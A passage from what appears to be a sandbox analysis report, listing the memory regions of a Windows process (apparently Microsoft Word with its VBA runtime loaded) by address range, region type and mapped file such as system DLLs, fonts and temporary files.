"c:\\windows\\system32\\cryptsp.dll") Region: id = 303 start_va = 0x75300000 end_va = 0x75307fff entry_point = 0x75300000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 304 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 305 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x75340000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 306 start_va = 0x753b0000 end_va = 0x753d8fff entry_point = 0x753b0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 307 start_va = 0x753e0000 end_va = 0x753edfff entry_point = 0x753e0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 308 start_va = 0x753f0000 end_va = 0x753fafff entry_point = 0x753f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 309 start_va = 0x75460000 end_va = 0x7546bfff entry_point = 0x75460000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 310 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75470000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 311 start_va = 0x754c0000 end_va = 0x754e6fff entry_point = 0x754c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 312 start_va = 0x754f0000 end_va = 0x7551cfff entry_point = 0x754f0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 313 start_va = 0x755b0000 end_va = 0x756ccfff entry_point = 0x755b0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 314 start_va = 0x756d0000 end_va = 0x756e1fff entry_point = 0x756d0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 315 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 316 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75710000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 317 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 318 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x758a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 319 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x764f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 320 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x76590000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 321 start_va = 0x766f0000 end_va = 0x76772fff entry_point = 0x766f0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 322 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x76780000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 323 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x76830000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 324 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76840000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 325 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x76890000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 326 start_va = 0x769a0000 end_va = 0x76b3cfff entry_point = 0x769a0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 327 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b40000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 328 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 329 start_va = 0x76c60000 end_va = 0x76e5afff entry_point = 0x76c60000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 330 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 331 start_va = 0x76f00000 end_va = 0x77035fff entry_point = 0x76f00000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 332 start_va = 0x77040000 end_va = 0x77134fff entry_point = 0x77040000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 333 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x77140000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 334 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 335 start_va = 0x773f0000 end_va = 0x773f4fff entry_point = 0x773f0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 336 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77400000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 337 start_va = 0x77420000 end_va = 0x77464fff entry_point = 0x77420000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 338 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 339 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 340 start_va = 0x7ff90000 end_va = 0x7ff9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff90000" filename = "" Region: id = 341 start_va = 0x7ffa0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffa0000" filename = "" Region: id = 342 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 343 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 344 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 345 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 346 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 347 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 348 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 349 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 350 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 351 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 352 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 353 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 354 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 355 start_va = 0x3b0000 end_va = 0x3befff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 356 start_va = 0x720000 end_va = 0x73efff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 357 start_va = 0x740000 end_va = 0x75efff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 358 start_va = 0x770000 end_va = 0x790fff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 359 start_va = 0x7a0000 end_va = 0x7befff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 360 start_va = 0x2280000 end_va = 0x229dfff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 361 start_va = 0x22d0000 end_va = 0x22eefff entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 362 start_va = 0x2310000 end_va = 0x232dfff entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 363 start_va = 0x2330000 end_va = 0x234efff entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 364 start_va = 0x2350000 end_va = 0x236efff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 365 start_va = 0x25e0000 end_va = 0x26dffff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 366 start_va = 0x28b0000 end_va = 0x28cefff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 367 start_va = 0x3730000 end_va = 0x374efff entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 368 start_va = 0x3a50000 end_va = 0x3acffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a50000" filename = "" Region: id = 369 start_va = 0x4660000 end_va = 0x46dffff entry_point = 0x4660000 region_type = mapped_file name = "~df22ff0ebd553c7a48.tmp" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\~DF22FF0EBD553C7A48.TMP" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\~df22ff0ebd553c7a48.tmp") Region: id = 370 start_va = 0x72190000 end_va = 0x723dafff entry_point = 0x72190000 region_type = mapped_file name = "gkword.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\GKWord.dll" (normalized: "c:\\program files\\microsoft office\\office15\\gkword.dll") Region: id = 371 start_va = 0x5e0000 end_va = 0x5e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 372 start_va = 0x5f0000 end_va = 0x5f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 373 start_va = 0x7f10000 end_va = 0x7fd6fff entry_point = 0x7f10000 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 374 start_va = 0x72350000 end_va = 0x723dbfff entry_point = 0x72350000 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 375 start_va = 0x729b0000 end_va = 0x729ebfff entry_point = 0x729b0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 376 start_va = 0x600000 end_va = 0x600fff entry_point = 0x600000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 377 start_va = 0xc00000 end_va = 0xc00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 378 start_va = 0x2160000 end_va = 0x2171fff entry_point = 0x2160000 region_type = mapped_file name = "uiautomationcore.dll.mui" filename = "\\Windows\\System32\\en-US\\UIAutomationCore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\uiautomationcore.dll.mui") Region: id = 379 start_va = 0x7fe0000 end_va = 0x8491fff entry_point = 0x0 region_type = private name = "private_0x0000000007fe0000" filename = "" Region: id = 380 start_va = 0x8660000 end_va = 0x875ffff entry_point = 0x0 region_type = private name = "private_0x0000000008660000" filename = "" Region: id = 381 start_va = 0x6f110000 end_va = 0x6f118fff entry_point = 0x6f110000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 382 start_va = 0x75890000 end_va = 0x75892fff entry_point = 0x75890000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 383 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 384 start_va = 0x70100000 end_va = 0x7016ffff entry_point = 0x70100000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 385 start_va = 0x75290000 end_va = 0x752a8fff entry_point = 0x75290000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 386 start_va = 0x70170000 end_va = 0x7017afff entry_point = 0x70170000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 387 start_va = 0x74190000 end_va = 0x74199fff entry_point = 0x74190000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 388 start_va = 0x74fd0000 end_va = 0x74fe6fff entry_point = 0x74fd0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 389 start_va = 0x74b60000 end_va = 0x74b9cfff entry_point = 0x74b60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 390 start_va = 0x74740000 end_va = 0x74764fff entry_point = 0x74740000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 391 start_va = 0x75350000 end_va = 0x753aefff entry_point = 0x75350000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 392 start_va = 0x84a0000 end_va = 0x857ffff entry_point = 0x84a0000 region_type = mapped_file name = "msword.olb" filename = "\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB" (normalized: "c:\\program files\\microsoft office\\office15\\msword.olb") Region: id = 393 start_va = 0x720d0000 end_va = 0x7234dfff entry_point = 0x720d0000 region_type = mapped_file name = "vbe7.dll" filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\progra~1\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll") Region: id = 394 start_va = 0x8760000 end_va = 0x897cfff entry_point = 0x8760000 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 395 start_va = 0x8760000 end_va = 0x897cfff entry_point = 0x87cc5da region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 396 start_va = 0x6d220000 end_va = 0x6d44dfff entry_point = 0x6d28c5da region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 397 start_va = 0x22a0000 end_va = 0x22a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022a0000" filename = "" Region: id = 398 start_va = 0x22b0000 end_va = 0x22bffff entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 399 start_va = 0x720a0000 end_va = 0x720c5fff entry_point = 0x720a0000 region_type = mapped_file name = "vbe7intl.dll" filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\progra~1\\common~1\\micros~1\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 400 start_va = 0x22c0000 end_va = 0x22c9fff entry_point = 0x22c0000 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 401 start_va = 0x22f0000 end_va = 0x22f0fff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 402 start_va = 0x2370000 end_va = 0x2372fff entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 403 start_va = 0x25a0000 end_va = 0x25a3fff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 404 start_va = 0x25c0000 end_va = 0x25c0fff entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 405 start_va = 0x2760000 end_va = 0x2760fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 406 start_va = 0x3b10000 end_va = 0x3b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b10000" filename = "" Region: id = 407 start_va = 0x5370000 end_va = 0x53effff entry_point = 0x5370000 region_type = mapped_file name = "~wrf{c5e4e3db-8582-4c0b-903a-e6981c726120}.tmp" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{C5E4E3DB-8582-4C0B-903A-E6981C726120}.tmp" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.word\\~wrf{c5e4e3db-8582-4c0b-903a-e6981c726120}.tmp") Region: id = 408 start_va = 0x8760000 end_va = 0x8b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008760000" filename = "" Region: id = 409 start_va = 0x28d0000 end_va = 0x28d3fff entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 410 start_va = 0x28f0000 end_va = 0x28f2fff entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 411 start_va = 0x3750000 end_va = 0x3753fff entry_point = 0x3750000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 412 start_va = 0x3b30000 end_va = 0x3b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b30000" filename = "" Region: id = 413 start_va = 0x3b50000 end_va = 0x3b63fff entry_point = 0x3c06c68 region_type = mapped_file name = "vbe7.dll" filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\progra~1\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll") Region: id = 414 start_va = 0x8580000 end_va = 0x85fbfff entry_point = 0x8cc6ebb region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll") Region: id = 415 start_va = 0x3bb0000 end_va = 0x3bb3fff entry_point = 0x0 region_type = private name = "private_0x0000000003bb0000" filename = "" Region: id = 416 start_va = 0x3bc0000 end_va = 0x3bc3fff entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 417 start_va = 0x43e0000 end_va = 0x43e3fff entry_point = 0x0 region_type = private name = "private_0x00000000043e0000" filename = "" Region: id = 418 start_va = 0x43f0000 end_va = 0x440ffff entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 419 start_va = 0x4510000 end_va = 0x4512fff entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 420 start_va = 0x4520000 end_va = 0x4524fff entry_point = 0x45d6c68 region_type = mapped_file name = "vbe7.dll" filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\progra~1\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll") Region: id = 421 start_va = 0x4530000 end_va = 0x4533fff entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 422 start_va = 0x4540000 end_va = 0x4543fff entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 423 start_va = 0x4550000 end_va = 0x4553fff entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 424 start_va = 0x46e0000 end_va = 0x46e2fff entry_point = 0x0 region_type = private name = "private_0x00000000046e0000" filename = "" Region: id = 425 start_va = 0x46f0000 end_va = 0x46f3fff entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 426 start_va = 0x4740000 end_va = 0x4743fff entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 427 start_va = 0x4750000 end_va = 0x4753fff entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 428 start_va = 0x4760000 end_va = 0x4763fff entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 429 start_va = 0x4770000 end_va = 0x4773fff entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 430 start_va = 0x8c40000 end_va = 0x8d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000008c40000" filename = "" Region: id = 431 start_va = 0x7ff8f000 end_va = 0x7ff8ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff8f000" filename = "" Region: id = 466 start_va = 0x8d40000 end_va = 0x953ffff entry_point = 0x0 region_type = private name = "private_0x0000000008d40000" filename = "" Region: id = 467 start_va = 0x72060000 end_va = 0x72096fff entry_point = 0x72060000 region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\msproof7.dll" (normalized: "c:\\program files\\microsoft office\\office15\\msproof7.dll") Region: id = 544 start_va = 0x4780000 end_va = 0x4780fff entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 545 start_va = 0x4790000 end_va = 0x4790fff entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 546 start_va = 0x47a0000 end_va = 0x47a1fff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 547 start_va = 0x53f0000 end_va = 0x53f0fff entry_point = 0x0 region_type = private name = "private_0x00000000053f0000" filename = "" Region: id = 548 start_va = 0x5400000 end_va = 0x5401fff entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 549 start_va = 0x5410000 end_va = 0x5411fff entry_point = 0x0 region_type = private name = "private_0x0000000005410000" filename = "" Region: id = 550 start_va = 0x7fe0000 end_va = 0x83a7fff entry_point = 0x0 region_type = private name = "private_0x0000000007fe0000" filename = "" Region: id = 551 start_va = 0x83b0000 end_va = 0x845afff entry_point = 0x83b0000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 552 start_va = 0x8460000 end_va = 0x8461fff entry_point = 0x0 region_type = private name = "private_0x0000000008460000" filename = "" Region: id = 553 start_va = 0x8470000 end_va = 0x8471fff entry_point = 0x0 region_type = private name = "private_0x0000000008470000" filename = "" Region: id = 554 start_va = 0x8b60000 end_va = 0x8c2bfff entry_point = 0x8b60000 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 555 start_va = 0x9540000 end_va = 0x960dfff entry_point = 0x9540000 region_type = mapped_file name = "timesbd.ttf" filename = "\\Windows\\Fonts\\timesbd.ttf" (normalized: "c:\\windows\\fonts\\timesbd.ttf") Region: id = 556 start_va = 0x9610000 end_va = 0x970ffff entry_point = 0x0 region_type = private name = "private_0x0000000009610000" filename = "" Region: id = 557 start_va = 0x9710000 end_va = 0x97c9fff entry_point = 0x9710000 region_type = mapped_file name = "calibril.ttf" filename = "\\Windows\\Fonts\\CalibriL.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf") Region: id = 558 start_va = 0x6e620000 end_va = 0x6e651fff entry_point = 0x6e620000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 621 start_va = 0x720000 end_va = 0x720fff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 622 start_va = 0x770000 end_va = 0x7a0fff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 623 start_va = 0x6e50000 end_va = 0x6f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000006e50000" filename = "" Region: id = 624 start_va = 0x6f50000 end_va = 0x6ffafff entry_point = 0x6f50000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 625 start_va = 0x7000000 end_va = 0x70f2fff entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 626 start_va = 0x7100000 end_va = 0x71f5fff entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 627 start_va = 0x8490000 end_va = 0x8491fff entry_point = 0x0 region_type = private name = "private_0x0000000008490000" filename = "" Region: id = 628 start_va = 0x8610000 end_va = 0x8611fff entry_point = 0x0 region_type = private name = "private_0x0000000008610000" filename = "" Region: id = 629 start_va = 0x8630000 end_va = 0x8631fff entry_point = 0x0 region_type = private name = "private_0x0000000008630000" filename = "" Region: id = 630 start_va = 0x8650000 end_va = 0x8651fff entry_point = 0x0 region_type = private name = "private_0x0000000008650000" filename = "" Region: id = 631 start_va = 0x97d0000 end_va = 0x98a4fff entry_point = 0x97d0000 region_type = mapped_file name = "calibrili.ttf" filename = "\\Windows\\Fonts\\CalibriLI.ttf" (normalized: "c:\\windows\\fonts\\calibrili.ttf") Region: id = 632 start_va = 0x98b0000 end_va = 0x9980fff entry_point = 0x98b0000 region_type = mapped_file name = "calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 633 start_va = 0x9990000 end_va = 0x9991fff entry_point = 0x0 region_type = private name = "private_0x0000000009990000" filename = "" Region: id = 634 start_va = 0x99b0000 end_va = 0x99b1fff entry_point = 0x0 region_type = private name = "private_0x00000000099b0000" filename = "" Region: id = 635 start_va = 0x99d0000 end_va = 0x99d1fff entry_point = 0x0 region_type = private name = "private_0x00000000099d0000" filename = 